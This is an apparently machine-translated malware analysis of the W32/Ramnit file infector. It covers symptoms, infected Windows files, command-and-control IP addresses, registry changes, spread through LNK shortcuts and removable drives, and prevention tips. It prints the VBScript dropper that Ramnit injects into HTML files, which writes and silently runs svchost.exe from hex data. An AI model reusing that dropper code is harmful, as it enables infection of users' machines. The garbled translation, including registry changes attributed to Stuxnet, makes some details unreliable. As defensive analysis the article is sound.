W32/Ramnit
Now with the ability to exploit LNK (Shortcut)
If Cristiano Ronaldo in URLs as Stuxnet, of course you ask what is likened to a virus as Messi? The answer is Ramnit. Although not explosive like Stuxnet, but with capabilities that are not inferior to the injection Stuxnet victim files, clear Ramnit infect many computers in Indonesia and slowly but surely cemented himself as one of the warlords who pelru virus alert computer users in Indonesia. Moreover, the latest variant Ramnit who now have the ability to exploit security holes LNK (Shortcut) so he was able to spread itself by creating shortcuts.
In the year 2010, which utilizes the dominance stuxnet vulnerabilities LNK (shortcut) is an intelligent work one step from the makers of malware. Not merely dominate, but also a trending topic malware in various articles and analysis worldwide.
At the moment the domination stuxnet still booming today, should we also need to be alert against new malware variants that attempted to show the existence of his hard work with the business of malware authors. Among the variants of malware that is worth the watch is detected as W32/Ramnit by Norman Security Suite (see Figure 1). Currently, variants of malware ramnit has spread rapidly around the world. Ramnit attacks come complete foreign domination of malware spread in Indonesia.
Image 1, Norman detect malware W32/Ramnit
Family malware W32/Ramnit
Ramnit Malware malware group is not really new, but has been actively spread also in 2010. Just because of malware such as user security hole LNK shortcut, sality, stuxnet, which makes this malware is not a concern of the analysis and computer users in the world.
Just like stuxnet, variant W32/Ramnit first appeared in mid-July and August 2010. While the second variant W32/Ramnit appear in October and November 2010, along with his scene-sality attack shortcut. And in mid-January 2011 is currently emerging is the third variant of W32/Ramnit family who tried to follow in the footsteps of its predecessors by using the security hole LNK (shortcut) to carry the infection and spread.
Characteristics W32/Ramnit
One of the things that make us need to be careful of that because this malware W32/Ramnit including groups that perform infectious virus files like Sality, Virut and Alman. This can be a scourge for computer users, because it will be difficult to clean the virus is doing the file infection, especially executable files (application).
W32/Ramnit is one of the variant viruses that make infection executable file (application). And not only executable files, but also do infections on the web file (HTML) files and DLL (dynamic load library).
Also, if you connect to the internet, ramnit will contact a remote server (IRC server) and connect to multiple addresses zombie servers to download a set of malware (viruses, trojans, spyware). At some particular time, W32/Ramnit using ads and popups to the content of pornography and gambling (casinos) and other commercial advertising that would make you uncomfortable when about browsing and surfing. Imagine if this happens when your child is under the age of the computer you're using protection with Parental Control. For parents this disaster because your child is exposed to pornography (because chances are that displayed pornographic content would escape the Parental Control which in pairs) and for children it might be considered "a blessing" for protection in the tide of pornography which turned out to be tricked.
By also exploit security holes LNK (shortcut), then the easier step to infect computer users quickly. Although not all three variants W32/Ramnit using the security hole LNK (shortcut), but almost all variants W32/Ramnit will be very difficult to clean.
Symptoms & Effects W32/Ramnit
Some symptoms that occur if you are already infected are:
* Pop-up ads or pop-ups to the content of pornography / gambling
In some particular time, the browser will open a pop-up ads or pop-ups that contain pornographic content or gambling (casino). This sometimes makes the user's computer becomes uncomfortable. (see Image 2)
Image2, Pop-up ads that run W32/Ramnit
* Appears script error pop-ups or error after a pop-up ads that appear
After a pop-up ads that appear, will appear a pop-up error or script error from the browser. It appears this error script-like virus "ARP spoofing"in 2008. (see Figure 3)
Image3, Pop-up error or script error
* Infection of EXE and DLL files
Just as the variants of malware sality, Alman and Virut, W32/Ramnit make exe file infection. Only, W32/Ramnit also do infections on the DLL file (dynamic load library).
Exe and dll files in-infection increased by between 100-120 kb, depending on the variant that infects Ramnit. Nevertheless, not all exe and dll files in-infection.
* Injection HTML file
Besides infecting exe files and etc, W32/Ramnit also do injection of HTML files. Injection is done by adding the header and footer. (see image 4 and 5)
In the header, W32/Ramnit add the script:
DropFileName = "svchost.exe"
Image4, the script is added to the header of the HTML file
While in the footer, W32/Ramnit add the script:
Set FSO = CreateObject ("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & '\" DropFileName
If FSO.FileExists(DropPath)=False Then
Set fileobj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step2
Fileobj.write chr (CLng("&H" & Mid(WriteData, i,2)))
Next
Fileobj.close
End If
Set WSHshell = CreateObject ("Wscript.shell")
WSHshell.Run DropPath, 0
Image5, the script is added to the footer of the HTML file
* Creating Windows services function to be blank
With the action to inject the files on the file Iexplore.exe and services.exe file, and add a script to the web files (htm / html) making the function of the Windows services to be blank. (see figure 6)
Image6, the Windows Services function to be blank
* Creating computer hangs / slow and even network connections become disconnected.
Windows system files that would be targeted by injection W32/Ramnit namely:
-C: \ WINDOWS \ system32 \ svchost.exe (file system associated with the network connection, by injecting will make the network disconnected)
-C: \ WINDOWS \ system32 \ lsass.exe (file system-related computer activities, by injecting will make the computer hangs / slow).
-C: \ WINDOWS \ system32 \ services.exe (file system associated with the services and drivers that run)
-C: \ Program Files \ Internet Explorer \ Iexplore.exe (executable file from the internet explorer browser)
*Active in the process of memory
Malware W32/Ramnit try to connect to the Remote Server using Internet Explorer that have been on injection. This can be seen in the task manager, even though we are not open IE / Internet Explorer (see figure 7)
Image7, Process Iexplore.exe (Internet Explorer) that has been injected by W32/Ramnit
* Connect to Remote Server
Malware W32/Ramnit connect to the Remote Server to perform the necessary delivery information on the Remote Server. Remote Server is used that is between them:
195.2.252.247
195.2.252.252
69.50.193.157
74.125.227.17
74.125.227.18
74.125.227.20
95.211.127.69
* Transferring data to a Remote Server
Besides trying to connect and to communicate with a remote server, W32/Ramnit also tried to transfer data from the victim's computer to the Remote Server and vice versa send malware files into the victim's computer. (see image 8)
Image8, the transfer of data between the victim's computer with Remote Servers
* To broadcast
Just as it worms its Conficker, W32/Ramnit also do broadacast on the network. What was different was to W32/Ramnit only perform at one address, namely: ADX.ADNXS.COM (see image 9)
Image9, conducted by Broadcast W32/Ramnit
File viruses W32/Ramnit
Malware W32/Ramnit created using the C programming language is compressed using UPX. File malware has characteristics as follows:
* Measuring 105 kb
* Type the file "Application '
* Using the icon "music folder"
* Extension "exe"
W32/Ramnit When run, it will inject some Windows system files are:
C: \ WINDOWS \ system32 \ lsass.exe
C: \ WINDOWS \ system32 \ svchost.exe
C: \ WINDOWS \ system32 \ services.exe
C: \ Program Files \ Internet Explorer \ Iexplore.exe
If connected to the internet, W32/Ramnit will download some files and folders malware as follows:
C:\Documents and Settings\%user%\Local Settings\Temp\[angka].tmp
C:\Documents and Settings\%user%\Local Settings\Temp\explorer.dat
C:\Documents and Settings\%user%\Local Settings\Temp\winlogon.dat
C:\Documents and Settings\%user%\Local Settings\Temp\[nama_acak].exe
C:\Documents and Settings\%user%\Start Menu\Programs\[nama_acak].exe
C:\Program Files\Intenet Explorer\complete.dat
C:\Program Files\Intenet Explorer\dmlconf.dat
C:\Program Files\win\[angka_acak].exe
C:\Program Files\qwe
C:\WINDOWS\[nama_acak].exe
C:\WINDOWS\System32\[nama_acak].dll
C:\WINDOWS\System32\[nama&angka_acak].dll
C:\WINDOWS\Temp\[angka].tmp
In addition, W32/Ramnit perform following injection of multiple files (if any) are:
C:\contacts.html
C:\Inetpub\wwwroot\index.html
C:\Program Files\Common Files\designer\MSADDNDR.DLL
C:\Program Files\Common Files\designer\MSHTMPGD.DLL
C:\Program Files\Common Files\designer\MSHTMPGR.DLL
C:\Program Files\Common Files\System\ado\MDACReadme.htm
C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL
C:\Program Files\MSN\MSNCoreFiles\OOBE\obelog.dll
C:\Program Files\MSN\MSNCoreFiles\OOBE\obemetal.dll
C:\Program Files\MSN\MSNCoreFiles\OOBE\obepopc.dll
C:\Program Files\MSN\MSNIA\custdial.dll
C:\Program Files\MSN\MSNIA\msniasvc.exe
C:\Program Files\MSN\MSNIA\prestp.exe
C:\Program Files\MSN\MsnInstaller\iasvcstb.dll
C:\Program Files\MSN\MsnInstaller\msdbxi.dll
C:\Program Files\MSN\MsnInstaller\msninst.dll
C:\Program Files\MSN\MsnInstaller\msninst.exe
C:\Program Files\MSN\MsnInstaller\msnsign.dll
C:\Program Files\NetMeeting\netmeet.htm
Also on removable disks / drives will create several files:
autorun.inf
Copy of Shortcut to (1).lnk
Copy of Shortcut to (2).lnk
Copy of Shortcut to (3).lnk
Copy of Shortcut to (4).lnk
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak1].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak2].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak3].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak4].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak5].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak6].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak7].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak8].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak9].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak10].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak11].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak1].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak2].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak3].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak4].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak5].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak6].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak7].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak8].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak9].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak10].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak11].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak1].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak2].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak3].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak4].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak5].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak6].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak7].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak1].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak2].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak3].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak4].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak5].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak6].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak7].cpl
And on networks that use mapping drives, trying to inject some files that have the following names:
- Blank.htm
- Citrus Punch.htm
- Clear Day.htm
- Fiesta.htm
- Ivy.htm
- Leaves.htm
- Maize.htm
- Nature.htm
- Network Blitz.htm
- Pie Charts.htm
- Sunflower.htm
- Sweets.htm
- Technical.htm
Registry Modifications
Some registry modifications made by the worm Stuxnet are as follows:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[nama_acak] = C:\Documents and Settings\%user%\Local Settings\Temp\[nama_acak].exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\featurecontrol
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\featurecontrol\FEATURE_BROWSER_EMULATION
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\international
Delete registry
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRes tore]
DisableSR = 0x00000001
Edit Registry
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
CurrentLevel =
1601 =
Distribution Method
Some ways W32/Ramnit make the distribution is as follows:
Drive by downloads (exploit)
W32/Ramnit initially spread by exploiting features of the drive by downloads in the Windows system. With the links that are spread on the forum or e-mail, trying to trick the user to run the link. In addition, when access to websites that provide content or browser plugins for download.
Removable drive / disk
This method is commonly done by computer users. W32/Ramnit make a lot of files to infect a computer, and were also exploit security holes LNK (shortcut). (see figure 10)
Image10, W32/Ramnit infected removable disk / drive
Network
W32/Ramnit try to do injections on a few web files (htm) specified in the network on a computer that make mapping drives. The following files are:
- Blank.htm
- Citrus Punch.htm
- Clear Day.htm
- Fiesta.htm
- Ivy.htm
- Leaves.htm
- Maize.htm
- Nature.htm
- Network Blitz.htm
- Pie Charts.htm
- Sunflower.htm
- Sweets.htm
- Technical.htm
Malware Prevention Tips from W32/Ramnit- Turn on Windows Firewall or use other firewall software. This is to prevent the access of undesirable
- Make sure the computer is getting the latest updates from the Windows system. To simplify use automatic updates of the system such as "Automatic Updates". Or it could also download the latest patch from the Microsoft website.
- Use antivirus software that are always updated with the good. This is to make it easier to variants of the new malware.
- Restrict access to administrator access. For users of Windows 7 and Vista, make sure the UAC (user account control) has been going well.
- Be cautious when opening e-mail attachment or when receiving the transfer of files from strangers. Always check to be scanned with the updated antivirus.
- Be wary of programs crack / keygen or programs that are not known. Because it could have been infected with or contain malware.
- Use a password that is not easy to read and known. Make sure always change the password at a particular time, and distinguish passwords with one another.
- Turn off the "autoplay" Windows to prevent unwanted programs on a removable drive / disk runs automaticallyTurn off file sharing if not used.
- If you do use file sharing only read-only status, or sharing configuration only for specific users.
- Be careful when accessing a website or a forum that provides certain links to be downloaded or installed